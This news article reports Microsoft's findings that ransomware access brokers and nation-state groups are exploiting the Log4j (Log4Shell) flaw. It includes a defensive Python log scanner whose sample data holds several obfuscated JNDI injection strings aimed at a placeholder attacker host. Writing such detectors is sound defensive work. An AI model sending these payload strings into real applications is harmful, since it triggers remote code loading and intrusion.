Microsoft: Ransomware ‘access brokers’ now exploiting Log4j vulnerability


Microsoft said it has observed multiple cybercriminal groups attempting to establish network access by exploiting the Apache Log4j vulnerability, with the expected goal of later selling that access to ransomware operators.

The arrival of these "access brokers" linked to ransomware affiliates suggests that an "increase in human-operated ransomware" could follow against both Windows and Linux systems, the company said in an update to its blog post on the critical Log4j vulnerability, known as Log4Shell.

Nation-state activity

In the same post, Microsoft also stated that it has observed nation-state activity groups affiliated with countries including China, Iran, North Korea and Turkey attempting to exploit the Log4j vulnerability. Microsoft said that in one instance, an Iranian group called Phosphorus, which had previously deployed ransomware, had "been seen acquiring and making modifications of the Log4j exploit." "We assess that Phosphorus has operationalized these modifications," the post said.

The first ransomware payloads exploiting Log4Shell were reported shortly after the flaw was disclosed. Bitdefender's security researchers observed an attempt to deploy a new ransomware strain, Khonsari, using the Log4Shell vulnerability, which was made public last Thursday.

Researchers have also told VentureBeat that in recent days they have observed attackers doing what looks like groundwork for launching ransomware, such as deploying privilege escalation tools and bringing malicious Cobalt Strike servers online. Cobalt Strike is a popular tool for enabling remote reconnaissance and lateral movement in ransomware attacks.

Microsoft itself reported on Saturday that it had observed attackers installing Cobalt Strike by exploiting the Log4j vulnerability.


Now, Microsoft says it has observed cybercriminals using Log4Shell to gain a foothold in networks, with the expectation of selling that access to "ransomware-as-a-service" operators.

In a blog post update, Microsoft's threat research teams said they had "confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks."

"These access brokers then sell access to these networks to ransomware-as-a-service affiliates," Microsoft researchers said in the post.

The researchers noted that they "observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms."

Ransomware-as-a-service operators lease ransomware variants to other attackers, saving those attackers the effort of developing their own.

The growing threat

According to an earlier report from Digital Shadows, "initial access brokers" play a "growing role" in the cybercriminal space.

"Instead of deeply infiltrating an organization, this type of threat actor acts as a 'middleman' by breaking into as many companies as possible and moving to sell access to the highest bidder, often ransomware groups," Digital Shadows said.

Sophos senior threat researcher Sean Gallagher told VentureBeat on Tuesday that he expects to see targeted attempts to plant backdoors in networks, including by access brokers who will then sell those backdoors to other criminals. "And those other criminals will inevitably include ransomware gangs," Gallagher said.

At the time of writing, there has been no public report of a successful ransomware breach that exploited the Log4j vulnerability.

Extensive vulnerability

Overall, the researchers said they expect the Log4j vulnerability to result in ransomware attacks, as the flaw is both widespread and considered trivial to exploit. Many applications and services written in Java are potentially vulnerable to Log4Shell, which can enable unauthenticated remote code execution. Researchers at cybersecurity giant Check Point said they have observed Log4j exploitation attempts against more than 44% of corporate networks worldwide.
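The "exploitation attempts" counted above are typically visible in web server logs: the attacker places a Log4j lookup string such as `${jndi:ldap://attacker/x}` in any field the target application logs (User-Agent, a query parameter, an API header), and a vulnerable Log4j instance resolves it and fetches a remote payload. The following detector is an added example written for this page, not code from Microsoft, Check Point or VentureBeat. It normalizes the common obfuscations seen in the wild (percent-encoding, `${lower:j}`, `${upper:j}`, and the `${::-j}` / `${env:X:-j}` default-value trick) before matching, because a naive grep for `jndi` misses them. The log lines and the 203.0.113.10 address are constructed test data, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not real traffic). Line 1 is benign;
# lines 2-5 carry a JNDI lookup, each with a different obfuscation.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:12:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:12:04 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3A'
    '%24%7Blower%3Al%7Ddap%3A%2F%2F203.0.113.10%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [13/Dec/2021:10:12:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.10/x}"',
    '10.0.0.9 - - [13/Dec/2021:10:12:06 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi:dns://203.0.113.10/x}"',
]

# ${lower:X} / ${upper:X}: innermost only (no nested "$", "{" or "}" inside).
LOWER_UPPER_RE = re.compile(r"\$\{\s*(lower|upper)\s*:([^${}]*)\}", re.I)
# ${prefix:key:-default}: a lookup that fails and falls back to "default".
# Attackers use ${::-j} or ${env:NOSUCHVAR:-j} to spell out "jndi" one char at a time.
DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The resolved lookup we actually care about: ${jndi:<scheme>:<target>}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-zA-Z]+):([^}]*)\}", re.I)


def _case_fold(m: re.Match) -> str:
    """Apply the lower/upper transform the lookup would have applied."""
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(s: str, max_rounds: int = 10) -> str:
    """Iteratively undo percent-encoding and resolve nested lookups until
    nothing changes. Bounded so a pathological input cannot loop forever."""
    for _ in range(max_rounds):
        prev = s
        s = unquote(s)                      # handles single and double encoding
        s = LOWER_UPPER_RE.sub(_case_fold, s)
        s = DEFAULT_RE.sub(lambda m: m.group(1), s)
        if s == prev:
            break
    return s


def find_jndi(line: str):
    """Return (scheme, target) if the normalized line contains a JNDI lookup."""
    m = JNDI_RE.search(normalize(line))
    if not m:
        return None
    return m.group(1).lower(), m.group(2).lstrip("/")


def scan_logs(lines):
    """Scan log lines; return one hit dict per line containing a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            scheme, target = found
            hits.append({"line": n, "scheme": scheme, "target": target, "raw": line})
    return hits


if __name__ == "__main__":
    for h in scan_logs(SAMPLE_LOGS):
        print(f"line {h['line']}: jndi via {h['scheme']} -> {h['target']}")
```

Two caveats a practitioner should keep in mind. A hit only proves an attempt, not a successful exploit; confirmation needs the target host's outbound connections (LDAP on 389/1389, RMI on 1099, DNS to unexpected resolvers) or a Java process spawning a shell. And the normalizer only covers the obfuscations listed above; new variants appear regularly, so this kind of log scan complements, rather than replaces, inventorying and patching vulnerable Log4j instances.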

"We haven't seen direct ransomware deployments, but it's just a matter of time," Nick Biasini, Cisco Talos' head of outreach, said in an email Tuesday. "This is a high-severity vulnerability that can be found in many products. The time required to patch everything alone will allow different threat groups to take advantage of it in various attacks, including ransomware."

The vulnerability arrives with most businesses already reporting first-hand experience of ransomware in the past year. A recent CrowdStrike survey found that 66% of organizations experienced ransomware attacks in the last 12 months, up from 56% in 2020. And average ransomware payments rose nearly 63% to $1.79 million in 2021, the report said.

